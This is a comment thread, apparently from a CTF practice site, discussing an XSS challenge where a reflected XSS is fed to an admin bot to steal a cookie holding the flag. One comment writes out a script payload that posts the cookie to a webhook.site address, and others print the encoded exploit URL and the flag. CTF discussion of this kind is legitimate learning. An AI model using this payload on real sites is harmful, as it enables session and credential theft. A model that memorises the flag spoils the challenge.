15614005380 @ 2024-03-07 23:22:16 👍0
典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个
meilanzhuju @ 2024-03-07 23:22:16 👍0
有点晕乎
qingfeng1115 @ 2023-12-07 23:22:16 👍0
<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a
yituoshi @ 2023-12-07 23:22:16 👍0
Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08
justsosoloveyou @ 2023-11-07 23:22:16 👍3
第一个框反射xss,第二个框存储xss。将第一个框触发xss的url输入到第二个框,后台自动访问url后即可触发xss盗取cookie里的flag。注意需要将js编码。
lltong @ 2024-03-07 23:22:16 👍0
将js编码,是怎么编码呢
flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252